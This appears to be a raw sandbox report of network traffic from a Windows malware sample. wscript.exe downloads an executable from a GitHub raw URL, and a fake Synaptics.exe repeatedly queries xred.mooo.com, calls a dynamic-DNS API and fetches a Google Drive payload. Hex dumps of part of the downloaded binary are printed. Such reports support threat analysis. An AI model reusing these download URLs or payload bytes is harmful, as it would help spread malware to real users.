                                                                                                                                                                Dec 25, 2024 09:07:23.190854073 CET1.1.1.1192.168.2.40x3356No error (0)docs.google.com142.250.181.14A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:24.226063013 CET1.1.1.1192.168.2.40x8f89Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:24.544472933 CET1.1.1.1192.168.2.40x3222No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:26.239525080 CET1.1.1.1192.168.2.40x6f36No error (0)drive.usercontent.google.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:29.453108072 CET1.1.1.1192.168.2.40xf930Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:35.281929970 CET1.1.1.1192.168.2.40x8903Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:40.073894024 CET1.1.1.1192.168.2.40x30b2Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:46.018011093 CET1.1.1.1192.168.2.40x188bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:53.042840958 CET1.1.1.1192.168.2.40x1793Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:53.359473944 CET1.1.1.1192.168.2.40x78a5No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:53.359473944 CET1.1.1.1192.168.2.40x78a5No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:00.130219936 CET1.1.1.1192.168.2.40xe842Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:07.080657005 CET1.1.1.1192.168.2.40x23f5Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:14.052505970 CET1.1.1.1192.168.2.40xb374Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:21.029758930 CET1.1.1.1192.168.2.40x894dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:26.133095980 CET1.1.1.1192.168.2.40xbf12No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:26.133095980 CET1.1.1.1192.168.2.40xbf12No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:27.953552008 CET1.1.1.1192.168.2.40x8391Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:34.906083107 CET1.1.1.1192.168.2.40xd74eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:39.656625032 CET1.1.1.1192.168.2.40xbdccName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:45.468411922 CET1.1.1.1192.168.2.40xa1d6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:50.165954113 CET1.1.1.1192.168.2.40x767cName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:56.034449100 CET1.1.1.1192.168.2.40xae77Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:09:02.989532948 CET1.1.1.1192.168.2.40x7153Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:09:22.684506893 CET1.1.1.1192.168.2.40x95e7Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • raw.githubusercontent.com
                                                                                                                                                                • docs.google.com
                                                                                                                                                                • drive.usercontent.google.com
                                                                                                                                                                • freedns.afraid.org

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.44974569.42.215.252806100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 25, 2024 09:07:24.681916952 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                User-Agent: MyApp
                                                                                                                                                                Host: freedns.afraid.org
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Dec 25, 2024 09:07:25.916393995 CET243INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:25 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.449730185.199.108.1334435544C:\Windows\System32\wscript.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:01 UTC375OUTGET /knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-ch
                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-25 08:07:01 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 1688576
                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                ETag: "f4ee902a55c293ed4c24b0e1ccded49d3b64ed7008f2f7c8fb5e14121e99838f"
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                X-GitHub-Request-Id: CA7E:20465E:2C25DE:31D3D5:676BBD25
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:01 GMT
                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                X-Served-By: cache-ewr-kewr1740036-EWR
                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                X-Timer: S1735114021.494368,VS0,VE102
                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                X-Fastly-Request-ID: 6461356311f259b1c6953a6eb4dba7e8f567f46c
                                                                                                                                                                Expires: Wed, 25 Dec 2024 08:12:01 GMT
                                                                                                                                                                Source-Age: 0
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: ff ff cc 83 44 24 04 f8 e9 e9 54 00 00 83 44 24 04 f8 e9 07 55 00 00 83 44 24 04 f8 e9 11 55 00 00 cc cc 65 11 40 00 6f 11 40 00 79 11 40 00 01 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 85 11 40 00 08 00 00 00 00 00 00 00 8d 40 00 00 12 40 00 91 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 40 00 0c 00 00 00 c0 10 40 00 34 3e 40 00 2c 66 40 00 38 66 40 00 48 3e 40 00 3c 3e 40 00 48 66 40 00 a0 3b 40 00 dc 3b 40 00 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 8b c0 18 12 40 00 04 09 54 44 61 74 65 54 69 6d 65 01 ff 25 88 02 4a 00 8b c0 ff 25 84 02 4a 00 8b c0 ff 25 80 02 4a 00 8b c0 ff 25 7c 02 4a 00 8b c0 ff 25 78 02 4a 00 8b c0 ff 25 74 02 4a 00 8b c0 ff 25 70 02 4a 00 8b c0 ff 25 6c 02 4a
                                                                                                                                                                Data Ascii: D$TD$UD$Ue@o@y@F@@@@@@4>@,f@8f@H>@<>@Hf@;@;@TInterfacedObject@TDateTime%J%J%J%|J%xJ%tJ%pJ%lJ
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 3b ee 77 46 8b c6 03 43 0c 3b 44 24 10 77 3b 3b 74 24 08 73 04 89 74 24 08 8b c6 03 43 0c 3b 44 24 0c 76 04 89 44 24 0c 68 00 80 00 00 6a 00 56 e8 ef fc ff ff 85 c0 75 0a c7 05 c8 e5 49 00 01 00 00 00 8b c3 e8 8a fd ff ff 8b df 81 fb ec e5 49 00 75 a7 8b 44 24 04 33 d2 89 10 83 7c 24 0c 00 74 19 8b 44 24 04 8b 54 24 08 89 10 8b 44 24 0c 2b 44 24 08 8b 54 24 04 89 42 04 83 c4 14 5d 5f 5e 5b c3 53 56 57 55 83 c4 f4 89 4c 24 04 89 14 24 8b d0 8b ea 81 e5 00 f0 ff ff 03 14 24 81 c2 ff 0f 00 00 81 e2 00 f0 ff ff 89 54 24 08 8b 44 24 04 89 28 8b 44 24 08 2b c5 8b 54 24 04 89 42 04 8b 35 ec e5 49 00 eb 3c 8b 5e 08 8b 7e 0c 03 fb 3b eb 76 02 8b dd 3b 7c 24 08 76 04 8b 7c 24 08 3b fb 76 1e 6a 04 68 00 10 00 00 2b fb 57 53 e8 26 fc ff ff 85 c0 75 0a 8b 44 24 04 33
                                                                                                                                                                Data Ascii: ;wFC;D$w;;t$st$C;D$vD$hjVuIIuD$3|$tD$T$D$+D$T$B]_^[SVWUL$$$T$D$(D$+T$B5I<^~;v;|$v|$;vjh+WS&uD$3
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: e8 d5 f7 ff ff 68 cc e5 49 00 e8 d3 f7 ff ff c3 e9 05 27 00 00 eb db 5b 5d c3 53 3b 05 18 e6 49 00 75 09 8b 50 04 89 15 18 e6 49 00 8b 50 04 8b 48 08 81 f9 00 10 00 00 7f 38 3b c2 75 17 85 c9 79 03 83 c1 03 c1 f9 02 a1 24 e6 49 00 33 d2 89 54 88 f4 eb 24 85 c9 79 03 83 c1 03 c1 f9 02 8b 1d 24 e6 49 00 89 54 8b f4 8b 00 89 02 89 50 04 5b c3 8b 00 89 02 89 50 04 5b c3 8d 40 00 8b 15 28 e6 49 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 28 e6 49 00 75 e8 c7 05 c8 e5 49 00 03 00 00 00 33 d2 8b c2 c3 90 53 8b ca 83 e9 04 8d 1c 01 83 fa 10 7c 0f c7 03 07 00 00 80 8b d1 e8 b9 01 00 00 5b c3 83 fa 04 7c 0c 8b ca 81 c9 02 00 00 80 89 08 89 0b 5b c3 ff 05 b4 e5 49 00 8b d0 83 ea 04 8b 12 81 e2 fc ff ff 7f 83 ea 04 01 15 b8 e5 49 00 e8 f3 05 00 00
                                                                                                                                                                Data Ascii: hI'[]S;IuPIPH8;uy$I3T$y$ITP[P[@(IJ;rJ;r(IuI3S|[|[II
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 55 8b ec 83 c4 f8 53 56 57 8b d8 80 3d c4 e5 49 00 00 75 09 e8 fb f8 ff ff 84 c0 74 08 81 fb f8 ff ff 7f 7e 0a 33 c0 89 45 fc e9 54 01 00 00 33 c9 55 68 04 23 40 00 64 ff 31 64 89 21 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 20 f2 ff ff 83 c3 07 83 e3 fc 83 fb 0c 7d 05 bb 0c 00 00 00 81 fb 00 10 00 00 0f 8f 93 00 00 00 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 24 e6 49 00 8b 54 82 f4 85 d2 74 79 8b f2 8b c6 03 c3 83 20 fe 8b 42 04 3b d0 75 1a 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 0d 24 e6 49 00 33 ff 89 7c 81 f4 eb 26 8b cb 85 c9 79 03 83 c1 03 c1 f9 02 8b 3d 24 e6 49 00 89 44 8f f4 8b 0a 89 4d f8 8b 4d f8 89 41 04 8b 4d f8 89 08 8b c6 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 b4 e5 49 00 83 eb 04 01 1d b8 e5 49 00 e8 a2 21 00 00 e9 84 00 00 00
                                                                                                                                                                Data Ascii: USVW=Iut~3ET3Uh#@d1d!=MIthI }y$ITty B;uy$I3|&y=$IDMMAMREII!
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: c0 74 05 89 5d fc eb 36 8b c6 e8 8f fa ff ff 8b f8 8b c3 83 e8 04 8b 00 25 fc ff ff 7f 83 e8 04 3b f0 7d 02 8b c6 85 ff 74 11 8b d7 8b cb 91 e8 be 02 00 00 8b c3 e8 f3 fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 50 27 40 00 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 b8 ec ff ff c3 e9 f2 1b 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8d 40 00 53 85 c0 7e 15 ff 15 44 b0 49 00 8b d8 85 db 75 0b b0 01 e8 44 01 00 00 eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 48 b0 49 00 8b d8 85 db 74 0b b0 02 e8 24 01 00 00 eb 02 33 db 8b c3 5b c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 4c b0 49 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 48 b0 49 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 44 b0 49 00 59 09 c0 74 e7 89 01 c3
                                                                                                                                                                Data Ascii: t]6%;}t}3ZYYdhP'@=MIthIE_^[Y]@S~DIuD3[StHIt$3[t2tPLIYtHIutPDIYt
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 06 ff 15 2c e0 49 00 b8 d2 00 00 00 e9 d3 1c 00 00 c3 8b c0 53 56 8b f2 8b d8 66 8b 43 04 66 3d b0 d7 72 06 66 3d b3 d7 76 07 bb 66 00 00 00 eb 2b 66 3d b0 d7 74 07 8b c3 e8 02 04 00 00 66 89 73 04 80 7b 48 00 75 0d 83 7b 18 00 75 07 c7 43 18 70 2d 40 00 8b c3 ff 53 18 8b d8 85 db 74 07 8b c3 e8 31 fc ff ff 8b c3 5e 5b c3 66 ba b1 d7 e8 9f ff ff ff c3 8b c0 53 8b d8 33 c0 89 43 10 33 c0 89 43 0c 6a 00 8d 43 10 50 8b 43 08 50 8b 43 14 50 8b 03 50 e8 6d e5 ff ff 85 c0 75 0e e8 e4 e5 ff ff 83 f8 6d 75 06 33 c0 5b c3 33 c0 5b c3 8d 40 00 33 c0 c3 90 53 56 51 8b d8 8b 73 0c 85 f6 75 04 33 c0 eb 26 6a 00 8d 44 24 04 50 56 8b 43 14 50 8b 03 50 e8 54 e5 ff ff 85 c0 75 07 e8 a3 e5 ff ff eb 02 33 c0 33 d2 89 53 0c 5a 5e 5b c3 8b c0 53 8b d8 53 e8 db e4 ff ff 48 0f
                                                                                                                                                                Data Ascii: ,ISVfCf=rf=vf+f=tfs{Hu{uCp-@St1^[fS3C3CjCPCPCPPmumu3[3[@3SVQsu3&jD$PVCPPTu33SZ^[SSH
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e 5b c3 90 66 81 78 04 b1 d7 75 1d 8b 50 0c 3b 50 10 73 15 03 50 14 66 f7 40 06 01 00 74 19 8a 0a 80 f9 1a 75 12 b0 01 c3 50 e8 d1 00 00 00 5a 80 fc 1a 74 f1 ff 4a 0c 31 c0 c3 90 53 56 8b d8 83 ce ff 66 8b 43 04 66 3d b0 d7 76 29 66 3d b3 d7 77 23 6a 00 8b 03 50 e8 b3 df ff ff 8b f0 83 fe ff 75 07 e8 5f f6 ff ff eb 15 8b c6 33 d2 f7 73 08 8b f0 eb 0a b8 67 00 00 00 e8 38 f6 ff ff 8b
                                                                                                                                                                Data Ascii: 8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[fxuP;PsPf@tuPZtJ1SVfCf=v)f=w#jPu_3sg8
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 08 04 39 5f 5b c3 8b c0 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 8a 2a 42 08 28 40 fe c9 75 f6 c3 90 e9 03 00 00 00 c3 8b c0 53 31 db 85 c0 7c 4d 0f 84 9a 00 00 00 3d 00 14 00 00 0f 8d 81 00 00 00 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de c9 c1 e8 05 74 79 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de c9 c1 e8 04 74 61 8d 04 80 db ac 43 bf 39 40 00 de c9 eb 53 f7 d8 3d 00 14 00 00 7d 46 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de f9 c1 e8 05 74 34 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de f9 c1 e8 04 74 1c 8d 04 80 db ac 43 bf 39 40 00 de f9 eb 0e dd d8 db ab e9 37 40 00 eb 04 dd d8 d9 ee 5b c3 00 00 00 00 00 00 00 80 ff 7f 00 00 00 00 00 00 00 80 ff 3f 00 00 00 00 00 00 00 a0 02 40 00 00 00 00 00 00 00 c8
                                                                                                                                                                Data Ascii: 9_[VW_^@*B(@uS1|M=S7@tytS)9@taC9@S=}FS7@t4tS)9@tC9@7@[?@
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 28 29 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 24 3d 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb 17 8d 4d f8 8b 53 18 8b c7 e8 72 ff ff ff 8b 55 f8 8b c6 e8 bc 28 00 00 83 3e 00 0f 95 c3 33 c0 5a 59 59 64 89 10 68 2b 3d 40 00 8d 45 f8 e8 89 28 00 00 c3 e9 17 06 00 00 eb f0 8b c3 5f 5e 5b 59 59 5d c3 53 56 89 c3 8b 43 b8 85 c0 74 29 8b 08 83 c0 04 8b 32 3b 30 75 18 8b 72 04 3b 70 04 75 10 8b 72 08 3b 70 08 75 08 8b 72 0c 3b 70 0c 74 13 83 c0 1c 49 75 dc 8b 5b dc 85 db 74 04 8b 1b
                                                                                                                                                                Data Ascii: sr!()@USVW3]U3Uh$=@d0d 3Uct1Ct>>t!PPMSrU(>3ZYYdh+=@E(_^[YY]SVCt)2;0ur;pur;pur;ptIu[t


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.449741142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:25 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZVncMeoAbmqzRnkETno54w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.449740142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:25 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HGbHfaxYR4GZlRTEUCfWRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.449755142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:07:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:29 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gbtB9KR535hDf8DJ7TBMuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
